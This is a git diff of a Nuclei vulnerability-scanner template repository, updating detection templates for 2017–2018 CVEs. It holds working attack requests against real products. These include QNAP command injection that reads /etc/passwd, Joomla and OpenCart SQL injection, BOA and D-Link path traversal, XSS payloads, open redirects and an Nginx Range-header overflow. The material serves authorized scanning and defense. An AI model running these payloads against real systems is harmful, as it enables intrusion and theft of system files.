nuclei-templates/CVE-2017/CVE-2017-3528.yaml rename to nuclei-templates/CVE-2017/cve-2017-3528.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-5521.yaml b/nuclei-templates/CVE-2017/cve-2017-5521.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-5521.yaml rename to nuclei-templates/CVE-2017/cve-2017-5521.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-5631.yaml b/nuclei-templates/CVE-2017/cve-2017-5631.yaml index 6dcc26746a..8f0b35c820 100644 --- a/nuclei-templates/CVE-2017/cve-2017-5631.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-5631.yaml @@ -1,21 +1,35 @@ id: CVE-2017-5631 info: - name: CaseAware - Cross Site Scripting + name: KMCIS CaseAware - Cross-Site Scripting author: edoardottt severity: medium - description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: + - https://www.openbugbounty.org/incidents/228262/ + - https://www.exploit-db.com/exploits/42042/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware + epss-score: 0.00286 + epss-percentile: 0.65504 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems -requests: +http: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -35,3 +49,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-5982.yaml b/nuclei-templates/CVE-2017/cve-2017-5982.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-5982.yaml rename to nuclei-templates/CVE-2017/cve-2017-5982.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-6361.yaml b/nuclei-templates/CVE-2017/cve-2017-6361.yaml new file mode 100644 index 0000000000..1f8af111ec --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-6361.yaml @@ -0,0 +1,23 @@ +id: CVE-2017-6361 + +info: + name: QNAP QTS RCE + author: medbsq + severity: critical +# https://www.cvebase.com/cve/2017/6360 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/authLogin.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "root:[x*]:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-7529.yaml b/nuclei-templates/CVE-2017/cve-2017-7529.yaml index 63d93927e1..b05d81075d 100644 --- a/nuclei-templates/CVE-2017/cve-2017-7529.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-7529.yaml @@ -1,27 +1,29 @@ id: CVE-2017-7529 - info: - name: Nginx Remote Integer Overflow - author: medbsq + author: "Harsh Bothra" + name: "Nginx Remote Integer Overflow" severity: medium -# https://www.cvebase.com/cve/2017/7529 +# This template supports the detection part only. +# Do not test any website without permission +# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py + requests: - - method: GET - path: - - "{{BaseURL}}/" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Range: bytes=-17208,-9223372036854758792 + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Range: bytes=-17208,-9223372036854758792 + Connection: close + matchers-condition: and matchers: - - type: word - words: - - "Server: nginx" - - "Content-Range" - condition: and - part: header - type: status status: - 206 + - type: word + words: + - Content-Range + part: all \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-8917.yaml b/nuclei-templates/CVE-2017/cve-2017-8917.yaml index 6fcb2274df..a4968604e8 100644 --- a/nuclei-templates/CVE-2017/cve-2017-8917.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-8917.yaml @@ -1,15 +1,22 @@ -id: cve-2017-8917 +id: CVE-2017-8917 info: name: Joomla SQL Injection author: princechaddha - severity: high + severity: critical description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. reference: https://www.cvedetails.com/cve/CVE-2017-8917/ tags: cve,cve2017,joomla,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" + matchers: - type: word words: diff --git a/nuclei-templates/CVE-2017/CVE-2017-9288.yaml b/nuclei-templates/CVE-2017/cve-2017-9288.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-9288.yaml rename to nuclei-templates/CVE-2017/cve-2017-9288.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-9833.yaml b/nuclei-templates/CVE-2017/cve-2017-9833.yaml index ed4f48506c..fcdf436a30 100644 --- a/nuclei-templates/CVE-2017/cve-2017-9833.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-9833.yaml @@ -5,17 +5,31 @@ info: author: 0x_Akoko severity: high description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. + impact: | + An attacker can gain unauthorized access to sensitive files on the server. + remediation: | + Upgrade to a patched version of BOA Web Server or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42290 - - https://www.cvedetails.com/cve/CVE-2017-9833 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 + - https://pastebin.com/raw/rt7LJvyF + - https://www.exploit-db.com/exploits/42290/ + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - tags: boa,lfr,lfi,cve,cve2017 + epss-score: 0.7354 + epss-percentile: 0.98027 + cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: boa + product: boa + tags: cve,cve2017,boa,lfr,lfi,edb -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" @@ -29,5 +43,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/12 +# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-0101.yaml b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml index c737a701c8..617dcbd20c 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-0101.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml @@ -1,5 +1,4 @@ id: cve-2018-0101 - info: name: Cisco ASA Denial-of-Service # Leads to RCE author: dwisiswant0 @@ -10,14 +9,12 @@ info: remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. tags: cve,cve2018,cisco,dos,rce - requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* - - | POST / HTTP/1.1 Host: {{Hostname}} @@ -34,14 +31,12 @@ requests: A - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - - type: dsl dsl: - "status_code_2 == 500" @@ -49,4 +44,4 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or \ No newline at end of file + condition: or diff --git a/nuclei-templates/CVE-2018/cve-2018-0296.yaml b/nuclei-templates/CVE-2018/CVE-2018-0296.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-0296.yaml rename to nuclei-templates/CVE-2018/CVE-2018-0296.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1000129.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000129.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1000129.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1000129.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000671.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000671.yaml new file mode 100644 index 0000000000..009d5c0c00 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1000671.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-1000671 + +info: + name: Sympa version =>6.2.16 - Cross-Site Scripting + author: 0x_Akoko + severity: medium + description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor. + reference: + - https://github.com/sympa-community/sympa/issues/268 + - https://vuldb.com/?id.123670 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-1000671 + cwe-id: CWE-601 + epss-score: 0.00598 + epss-percentile: 0.77958 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sympa + product: sympa + shodan-query: http.html:"sympa" + tags: cve,cve2018,redirect,sympa,debian + +http: + - method: GET + path: + - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-1000861.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1000861.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1000861.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10093.yaml b/nuclei-templates/CVE-2018/CVE-2018-10093.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10093.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10093.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10095.yaml b/nuclei-templates/CVE-2018/CVE-2018-10095.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10095.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10095.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml b/nuclei-templates/CVE-2018/CVE-2018-10822.yaml index 64b8bf0b32..d93affb5d4 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-10822.yaml @@ -1,21 +1,19 @@ id: CVE-2018-10822 info: - name: D-Link Routers - Local File Inclusion + name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. reference: - https://www.exploit-db.com/exploits/45678 - - http://sploit.tech/2018/10/12/D-Link.html - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - - https://seclists.org/fulldisclosure/2018/Oct/36 + tags: cve,cve2018,lfi,router,dlink classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-10822 cwe-id: CWE-22 - tags: cve,cve2018,lfi,router,dlink requests: - method: GET @@ -27,10 +25,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11227.yaml b/nuclei-templates/CVE-2018/CVE-2018-11227.yaml index 493f9b52d5..dd9501ca2f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11227.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-11227.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + - https://github.com/monstra-cms/monstra/issues + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11227 cwe-id: CWE-79 + epss-score: 0.02135 + epss-percentile: 0.8903 + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: monstra + product: monstra_cms shodan-query: http.favicon.hash:419828698 - verified: "true" - tags: cve,cve2018,xss,mostra,mostracms,cms,edb + tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra -requests: +http: - raw: - | POST /admin/index.php?id=pages HTTP/1.1 @@ -36,8 +48,8 @@ requests: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -47,5 +59,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml index c99424a257..9412a5f837 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml @@ -1,25 +1,28 @@ id: CVE-2018-11231 info: - name: Opencart Divido plugin - Sql Injection + name: Opencart Divido - Sql Injection author: ritikchaddha severity: high + description: | + OpenCart Divido plugin is susceptible to SQL injection reference: - http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 - tags: opencart,sqli,cve,cve2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.10 cve-id: CVE-2018-11231 cwe-id: CWE-89 - description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information." + tags: cve,cve2018,opencart,sqli +variables: + num: "999999999" requests: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}} - {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2} + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} redirects: true max-redirects: 2 matchers-condition: and @@ -27,7 +30,9 @@ requests: - type: word part: body words: - - "6f7c6dcbc380aac3bcba1f9fccec991e" + - '{{md5({{num}})}}' - type: status status: - 200 + +# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/cve-2018-11409.yaml b/nuclei-templates/CVE-2018/CVE-2018-11409.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11409.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11409.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11473.yaml b/nuclei-templates/CVE-2018/CVE-2018-11473.yaml index 9419700bfe..b812c09865 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11473.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-11473.yaml @@ -6,26 +6,36 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/monstra-cms/monstra/issues/446 - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page - https://nvd.nist.gov/vuln/detail/CVE-2018-11473 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.39534 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: monstra + product: monstra shodan-query: http.favicon.hash:419828698 - verified: "true" - tags: cve,cve2018,xss,mostra,mostracms,cms + tags: cve,cve2018,xss,mostra,mostracms,cms,monstra -requests: +http: - raw: - | GET /users/registration HTTP/1.1 Host: {{Hostname}} - - | POST /users/registration HTTP/1.1 Host: {{Hostname}} @@ -33,7 +43,6 @@ requests: csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -41,8 +50,8 @@ requests: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -56,10 +65,9 @@ requests: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true - -# Enhanced by md on 2023/01/30 + part: body +# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml b/nuclei-templates/CVE-2018/CVE-2018-11709.yaml deleted file mode 100644 index 1b02923a23..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-11709 - -info: - name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - - https://wordpress.org/plugins/wpforo/#developers - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-11709 - cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11776.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11776.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1207.yaml b/nuclei-templates/CVE-2018/CVE-2018-1207.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1207.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1207.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml new file mode 100644 index 0000000000..94384ca163 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-12300 + +info: + name: Seagate NAS OS 4.3.15.1 - Open Redirect + author: 0x_Akoko + severity: medium + description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + impact: | + Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. + remediation: | + Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12300 + cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.45685 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: seagate + product: nas_os + tags: cve2018,cve,redirect,seagate,nasos + +http: + - method: GET + path: + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-12634.yaml b/nuclei-templates/CVE-2018/CVE-2018-12634.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12634.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12634.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12675.yaml b/nuclei-templates/CVE-2018/CVE-2018-12675.yaml new file mode 100644 index 0000000000..52e4353249 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12675.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-12675 + +info: + name: SV3C HD Camera L Series - Open Redirect + author: 0x_Akoko + severity: medium + description: | + SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. + reference: + - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory + - https://vuldb.com/?id.125799 + - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12675 + cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.44971 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sv3c + product: h.264_poe_ip_camera_firmware + tags: cve,cve2018,redirect,sv3c,camera,iot + +http: + - method: GET + path: + - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' + + matchers: + - type: word + part: body + words: + - '' +# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-12909.yaml b/nuclei-templates/CVE-2018/CVE-2018-12909.yaml new file mode 100644 index 0000000000..9092672f1f --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12909.yaml @@ -0,0 +1,50 @@ +id: CVE-2018-12909 + +info: + name: Webgrind <= 1.5 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI + remediation: | + Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md + - https://github.com/jokkedk/webgrind/issues/112 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12909 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Miraitowa70/POC-Notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-12909 + cwe-id: CWE-22 + epss-score: 0.00466 + epss-percentile: 0.74979 + cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: webgrind_project + product: webgrind + fofa-query: app="Webgrind" + tags: cve,cve2018,lfi,webgrind,webgrind_project + +http: + - method: GET + path: + - 